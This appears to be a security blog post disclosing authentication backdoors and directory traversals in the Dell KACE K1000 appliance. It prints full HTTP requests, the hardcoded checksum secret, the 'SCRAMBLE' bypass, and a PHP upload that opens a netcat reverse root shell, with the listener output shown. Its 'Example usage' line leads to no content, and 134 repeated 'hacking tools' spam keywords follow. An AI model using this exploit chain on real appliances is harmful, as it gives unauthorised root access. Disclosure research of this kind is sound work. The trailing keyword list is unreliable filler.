The Curious Case Of The Ninjamonkeypiratelaser Backdoor

A bit over a month ago I had the chance to play with a Dell KACE K1000 appliance ("http://www.kace.com/products/systems-management-appliance"). I'm not even sure how to feel about what I saw, mostly I was just disgusted. All of the following was confirmed on the latest version of the K1000 appliance (5.5.90545), if they weren't working on a patch for this - they are now.

Anyways, the first bug I ran into was an authenticated script that was vulnerable to path traversal:

POST /userui/downloadpxy.php HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=xxxxxxxxxxxxxxxxxxxxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
DOWNLOAD_SOFTWARE_ID=1227&DOWNLOAD_FILE=../../../../../../../../../../usr/local/etc/php.ini&ID=7&Download=Download

HTTP/1.1 200 OK
Date: Tue, 04 Feb 2014 21:38:39 GMT
Server: Apache
Expires: 0
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: public
Content-Length: 47071
Content-Disposition: attachment; filename*=UTF-8''..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fphp.ini
X-DellKACE-Appliance: k1000
X-DellKACE-Version: 5.5.90545
X-KBOX-Version: 5.5.90545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/ini
[PHP]
;;;;;;;;;;;;;;;;;;;
; About php.ini   ;
;;;;;;;;;;;;;;;;;;;

That bug is neat, but its post-auth and can't be used for RCE because it returns the file as an attachment :(

So moving along, I utilized the previous bug to navigate the file system (its nice enough to give a directory listing if a path is provided, thanks!), this led me to a file named "kbot_upload.php". This file is located on the appliance at the following location:

http://targethost/service/kbot_upload.php

This script includes "KBotUpload.class.php" and then calls "KBotUpload::HandlePUT()", it does not check for a valid session and utilizes its own "special" means to auth the request.

The "HandlePut()" function contains the following calls:

        $checksumFn = $_GET['filename'];
        $fn = rawurldecode($_GET['filename']);
        $machineId = $_GET['machineId'];
        $checksum = $_GET['checksum'];
        $mac = $_GET['mac'];
        $kbotId = $_GET['kbotId'];
        $version = $_GET['version'];
        $patchScheduleId = $_GET['patchscheduleid'];
        if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
            KBLog($_SERVER["REMOTE_ADDR"] . " token checksum did not match, "
                  ."($machineId, $checksumFn, $mac)");
            KBLog($_SERVER['REMOTE_ADDR'] . " returning 500 "
                  ."from HandlePUT(".construct_url($_GET).")");
            header("Status: 500", true, 500);
            return;
        }

The server checks to ensure that the request is authorized by inspecting the "checksum" variable that is part of the server request. This "checksum" variable is created by the client using the following:

      md5("$filename $machineId $mac" . 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');

Server side check:

    private static function calcTokenChecksum($filename, $machineId, $mac)
    {
        //return md5("$filename $machineId $mac" . $ip .
        //           'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
     
        // our tracking of ips really sucks and when I'm vpn'ed from
        // home I couldn't get patching to work, cause the ip that
        // was on the machine record was different from the
        // remote server ip.
        return md5("$filename $machineId $mac" .
                   'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
    }

The "secret" value is hardcoded into the application and cannot be changed by the end user (backdoor++;). Once an attacker knows this value, they are able to bypass the authorization check and upload a file to the server. 

In addition to this "calcTokenChecksum" check, there is a hardcoded value of "SCRAMBLE" that can be provided by the attacker that will bypass the auth check (backdoor++;):  

 if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {

Once this check is bypassed we are able to write a file anywhere on the server where we have permissions (thanks directory traversal #2!), at this time we are running in the context of the "www" user (boooooo). The "www" user has permission to write to the directory "/kbox/kboxwww/tmp", time to escalate to something more useful :)

From our new home in "tmp" with our weak user it was discovered that the KACE K1000 application contains admin functionality (not exposed to the webroot) that is able to execute commands as root using some IPC ("KSudoClient.class.php").

The "KSudoClient.class.php" can be used to execute commands as root, specifically the function "RunCommandWait". The following application call utilizes everything that was outlined above and sets up a reverse root shell, "REMOTEHOST" would be replaced with the host we want the server to connect back to:

    POST /service/kbot_upload.php?filename=db.php&machineId=../../../kboxwww/tmp/&checksum=SCRAMBLE&mac=xxx&kbotId=blah&version=blah&patchsecheduleid=blah HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Content-Length: 190
    <?php
    require_once 'KSudoClient.class.php';
    KSudoClient::RunCommandWait("rm /kbox/kboxwww/tmp/db.php;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEHOST 4444 >/tmp/f");?> 

Once this was sent, we can setup our listener on our server and call the file we uploaded and receive our root shell:

    http://targethost/service/tmp/db.php

On our host:

    ~$ ncat -lkvp 4444
    Ncat: Version 5.21 ( http://nmap.org/ncat )
    Ncat: Listening on 0.0.0.0:4444
    Ncat: Connection from XX.XX.XX.XX
    sh: can't access tty; job control turned off
    # id
    uid=0(root) gid=0(wheel) groups=0(wheel)  

So at the end of the the day the count looks like this:

Directory Traversals: 2
Backdoors: 2
Privilege Escalation: 1

That all adds up to owned last time I checked.

Example PoC can be found at the following location:
https://github.com/steponequit/kaced/blob/master/kaced.py

Example usage can be seen below:

Related word

1. Hack Tools Github
2. Hacking Tools For Pc
3. Hack Tools For Pc
4. Pentest Recon Tools
5. Hacking Tools For Windows Free Download
6. Hacking Tools Pc
7. Best Hacking Tools 2020
8. Pentest Tools Open Source
9. Hack Website Online Tool
10. Hacker
11. Hacker Tools Free
12. Pentest Tools Nmap
13. Pentest Tools Open Source
14. Hacking Tools Mac
15. Hacker Tools For Windows
16. Tools Used For Hacking
17. Install Pentest Tools Ubuntu
18. Hacker Tools 2020
19. Hacker Techniques Tools And Incident Handling
20. Pentest Tools Website Vulnerability
21. Hacker Tools Software
22. Hacking Tools Kit
23. Hack Tools 2019
24. Hacking Tools Github
25. Pentest Tools Url Fuzzer
26. Kik Hack Tools
27. Best Pentesting Tools 2018
28. How To Make Hacking Tools
29. Growth Hacker Tools
30. Hacking App
31. Hacking Tools Online
32. Wifi Hacker Tools For Windows
33. Hacking Tools Online
34. Pentest Tools Download
35. Pentest Tools
36. Computer Hacker
37. Tools 4 Hack
38. Hacking Tools For Windows
39. Hackers Toolbox
40. Hacking Tools 2019
41. Pentest Reporting Tools
42. Ethical Hacker Tools
43. Hack Website Online Tool
44. Hack Tool Apk
45. Hacking Tools For Beginners
46. Pentest Tools Download
47. Hacking Tools Free Download
48. Hacker Techniques Tools And Incident Handling
49. Pentest Tools Alternative
50. Pentest Tools For Windows
51. Pentest Tools Bluekeep
52. Hacking Tools For Windows 7
53. Nsa Hacker Tools
54. Hack Tools Pc
55. Hacking Tools Hardware
56. Hacker Tools For Ios
57. Ethical Hacker Tools
58. Underground Hacker Sites
59. Hacker Techniques Tools And Incident Handling
60. Top Pentest Tools
61. Pentest Tools Windows
62. Hacking Tools Hardware
63. Hack Tools 2019
64. Hacker Tool Kit
65. Hacker Tools Software
66. How To Install Pentest Tools In Ubuntu
67. Hacking Tools Windows 10
68. Pentest Tools Framework
69. Growth Hacker Tools
70. Hack Tools For Mac
71. Physical Pentest Tools
72. Hacking Tools For Windows
73. Pentest Tools Linux
74. Pentest Tools For Android
75. Hacking Tools Name
76. Pentest Tools Android
77. Pentest Tools Tcp Port Scanner
78. Blackhat Hacker Tools
79. Hacking Tools For Windows
80. Install Pentest Tools Ubuntu
81. Hack Tools Pc
82. Hack Tools Github
83. Pentest Tools Windows
84. Best Hacking Tools 2020
85. Hack Tools
86. Hack Tools Mac
87. Nsa Hack Tools Download
88. Pentest Tools Alternative
89. Pentest Tools Kali Linux
90. Hack Apps
91. Hacking Tools
92. Hacking App
93. Hack Tool Apk
94. Hack Tools Github
95. Hacking Tools 2020
96. Nsa Hack Tools
97. Hacker Tools Linux
98. Hacking Tools For Beginners
99. Pentest Tools Url Fuzzer
100. Pentest Tools For Android
101. Hacking Tools Download
102. Pentest Tools For Mac
103. Hacking Tools And Software
104. Hack Tools Download
105. Pentest Box Tools Download
106. How To Install Pentest Tools In Ubuntu
107. Hacker Tools Mac
108. Hacking Tools Pc
109. Hacking Tools Download
110. Hacking Tools
111. Pentest Tools Url Fuzzer
112. Hacker Tools For Pc
113. Pentest Tools Download
114. Hacker Tools Hardware
115. Usb Pentest Tools
116. Install Pentest Tools Ubuntu
117. Hack Tools Download
118. Hack Tools
119. Hacker Search Tools
120. Hak5 Tools
121. Pentest Tools Nmap
122. Hack Tools
123. Hacker Tools Online
124. Pentest Tools Find Subdomains
125. Hacker Tools Windows
126. Wifi Hacker Tools For Windows
127. Pentest Tools Alternative
128. Hackers Toolbox
129. Hacks And Tools
130. Usb Pentest Tools
131. Usb Pentest Tools
132. Hack Tools
133. Pentest Tools Nmap
134. Pentest Tools Subdomain